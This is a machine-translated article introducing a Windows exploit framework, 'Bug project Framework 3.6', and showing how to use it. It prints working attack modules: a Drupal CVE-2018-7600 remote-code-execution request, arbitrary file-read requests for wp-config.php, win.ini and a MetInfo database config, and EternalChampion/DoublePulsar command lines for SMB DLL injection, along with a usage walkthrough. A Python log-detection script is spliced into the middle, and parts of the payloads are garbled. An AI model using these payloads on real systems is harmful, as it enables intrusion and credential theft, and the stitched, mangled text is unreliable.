2025-01-23 Update From: SLTechnology News&Howtos
Shulou(Shulou.com)05/31 Report--
This article explains in detail how to use the command-line version of Bug project Framework V3.6 in web security. The editor thinks it is very practical and shares it here as a reference. I hope you get something out of it.
0x01 Preface
I began writing the graphical interface of the BPF framework in April 2017, and it has been in development for a year and a month. However, due to the high portability and simplicity of the graphical interface for vulnerability exploitation and its high attack capability, the graphical interface will not be made public, for a variety of reasons. Last week, I began writing the command-line version of this version 3.6.
With regard to the leaked 3.0 graphical version circulating on the network, I would like to explain that this version has a lot of bugs, not only module syntax bugs; the leaked version is also bundled with a lot of Trojans. I hope you don't download it hastily, to avoid unnecessary losses!
0x02 Project introduction
Software name: Bug project Framework
Version: 3.6
0x03 help
At the BPF root prompt:
Help: show help
Reload: reload the framework; all modules are refreshed
Search: search modules by keyword and display the matches (e.g. Search ms17-010)
Searchall: display all modules
Use: use a module (e.g. Use \buffer\ms17-010 Scan.bpf)
Set shellcodes: configure the default Shellcode path
Exit: exit BPF
At the BPF module prompt:
Help: show help
Show options: view the current module parameters and configuration
Set options: set the current module parameters and configuration
Set shellcodes: configure the default Shellcode path
Run: run the module
Exit: exit the current module
When you enter a command other than those listed above, the BPF framework treats it as a system command and passes it to the Windows operating system for processing.
HAPPY HACK! GOOD LUCK!
2018.5.7 BY Fplyth0ner
0x04 hands-on operation
First, we open the command line and change to the folder where the BPF framework is located. The framework's file structure is shown below:
Then type the full name of the main file of the BPF framework and execute:
You can see that the framework currently has 59 Web Exploit modules, 12 Web Poc modules and 33 Buffer modules. The Web Exploit module provides Web application vulnerability detection, the Web Poc module provides Web application vulnerability detection, and the Buffer module provides external program calls, such as code in interpreted languages like Python and Java, or calls to external executable files, so operation is flexible.
Since the framework only gives modules an execution environment and the functionality is mainly implemented by the modules, let's briefly show the code of three modules.
Web Exploit (Drupal core remote code execution vulnerability):
Command
Output file name
two
Post
/ user/register?element_parents=account/mail/%23value&ajax_form=1&_wrapper_format=drupal_ajax
Connection: keep-alive
Accept-Encoding: gzip, deflate
Accept: * / *
User-Agent: python-requests/2.18.4
Content-Length: 159
Mail [# markup] = | tee .txt & mail [# type] = markup&form_id=user_register_form&_drupal_ajax=1&mail [# post_render] [] = exec
Get
/. Txt
CVE-2018-7600
Remote code execution vulnerability in Drupal core
Affected versions:
Drupal 6.x,7.x,8.x
Web Poc (CMS Getshell vulnerability detection):
three
Download any file from WordPress DB-Backup Plugin
Get
/ wp-content/plugins/db-backup/download.php?file=../wp-config.php
one
Define (
U-Mail arbitrary file traversal / download
Get
/ webmail/client/mail/index.php?module=operate&action=attach-img-preview&d_url= file://C:\windows\win.ini&type=text/htm
one
[fonts]
MetInfo 5.2 arbitrary file read
Get
/ include/thumb.php?x=1&y=/../config&dir=config_db.php
one
Con_db_host
Designed to detect arbitrary file read vulnerabilities across CMS products
Enter the http:// URL directly to start the test.
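The request paths and parameters in the two module listings above are also what a defender can search for in web server access logs. The following Python sketch is an added example, not part of the BPF framework or the original article; the combined log format, the rule names and the sample log lines are assumptions constructed for illustration.

```python
import re
from urllib.parse import urlsplit, parse_qs

# Assumed input: Apache/nginx "combined" access-log lines.
LOG_RE = re.compile(
    r'^(?P<ip>\S+) .*?"(?P<method>[A-Z]+) (?P<target>\S+) HTTP/[\d.]+" (?P<status>\d{3})')

def classify(target):
    """Return the (hypothetical) rule name a request target matches, else None."""
    parts = urlsplit(target)
    path = parts.path.lower()
    # parse_qs percent-decodes values, so %23value becomes #value.
    q = {k: v[0] for k, v in parse_qs(parts.query, keep_blank_values=True).items()}
    if (path.endswith("/user/register") and "#" in q.get("element_parents", "")
            and q.get("_wrapper_format") == "drupal_ajax"):
        return "drupal-cve-2018-7600"
    if path.endswith("/wp-content/plugins/db-backup/download.php") and ".." in q.get("file", ""):
        return "wp-db-backup-file-download"
    if (path.endswith("/webmail/client/mail/index.php")
            and q.get("action") == "attach-img-preview"
            and q.get("d_url", "").lower().startswith("file:")):
        return "umail-file-read"
    if path.endswith("/include/thumb.php") and ".." in q.get("y", ""):
        return "metinfo-thumb-file-read"
    return None

def scan(lines):
    """Return (client_ip, status, rule) for each log line matching a signature."""
    hits = []
    for line in lines:
        m = LOG_RE.match(line)
        rule = classify(m.group("target")) if m else None
        if rule:
            hits.append((m.group("ip"), int(m.group("status")), rule))
    return hits

# Constructed sample lines (documentation IP ranges), not real traffic.
SAMPLE = [
    '203.0.113.7 - - [07/May/2018:10:00:01 +0000] "POST /user/register?element_parents='
    'account/mail/%23value&ajax_form=1&_wrapper_format=drupal_ajax HTTP/1.1" 200 120',
    '203.0.113.7 - - [07/May/2018:10:00:05 +0000] "GET /wp-content/plugins/db-backup/'
    'download.php?file=../wp-config.php HTTP/1.1" 404 0',
    '198.51.100.9 - - [07/May/2018:10:02:00 +0000] "GET /include/thumb.php?x=1&y=/../config'
    '&dir=config_db.php HTTP/1.1" 200 512',
    '198.51.100.20 - - [07/May/2018:10:03:00 +0000] "GET /user/register HTTP/1.1" 200 9000',
]

if __name__ == "__main__":
    print(*scan(SAMPLE), sep="\n")
```

The status code matters for triage: a 200 response to one of the file-read requests warrants checking what the server actually returned.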
Buffer (Eternalchampion):
Inject
NB,NR,MR
Dll
IP address
Port
Attack service
System version
System architecture
five
Doublepulsar-1.3.1.exe-NetworkTimeout 60-TargetIp-TargetPort-Protocol SMB-Architecture-Function OutputInstall-OutputFile 1.bin
Cj.exe
Ping-n 3 127.1 > nul
Eternalchampion-2.0.0.exe-TargetIp-TargetPort-ShellcodeBuffer-Protocol-Target
Doublepulsar-1.3.1.exe-TargetIp-TargetPort 445-DllPayload-Protocol SMB-Architecture-Function Rundll
Upper and lower correspondence
Port: 139 445
Attack service: NBT SMB
System architecture: x86 X64
System version:
XP_SP0SP1_X86: Windows XP Sp0 and Sp1, 32-bit
XP_SP2SP3_X86: Windows XP Sp2 and Sp3, 32-bit
XP_SP1_X64: Windows XP Sp1, 64-bit
XP_SP2_X64: Windows XP Sp2, 64-bit
SERVER_2003_SP0: Windows Server 2003 Sp0, 32-bit
SERVER_2003_SP1: Windows Server 2003 Sp1, 32-bit/64-bit
SERVER_2003_SP2: Windows Server 2003 Sp2, 32-bit/64-bit
VISTA_SP0: Windows Vista Sp0, 32-bit/64-bit
VISTA_SP1: Windows Vista Sp1, 32-bit/64-bit
VISTA_SP2: Windows Vista Sp2, 32-bit/64-bit
SERVER_2008_SP0: Windows Server 2008 Sp0, 32-bit/64-bit
SERVER_2008_SP1: Windows Server 2008 Sp1, 32-bit/64-bit
SERVER_2008_SP2: Windows Server 2008 Sp2, 32-bit/64-bit
WIN7_SP0: Windows 7 Sp0, 32-bit/64-bit
WIN7_SP1: Windows 7 Sp1, 32-bit/64-bit
SERVER_2008R2_SP0: Windows Server 2008 R2 Sp0, 32-bit/64-bit
SERVER_2008R2_SP1: Windows Server 2008 R2 Sp1, 32-bit/64-bit
WIN8_SP0: Windows 8 Sp0, 32-bit/64-bit
Going back to the command-line interface, we type: Search command execution
The search finds 21 available modules. We select the second module and load it with the Use command.
At the module prompt, use the show options command to view the module configuration.
Use set options to modify the module configuration as follows:
You can see that the modification has been successful.
Then type run and press Enter to test the specified target.
If you want to exit the current module, type exit to return to the BPF main prompt. Other types of modules are used in much the same way as above. Native system commands can also be used at the BPF command line.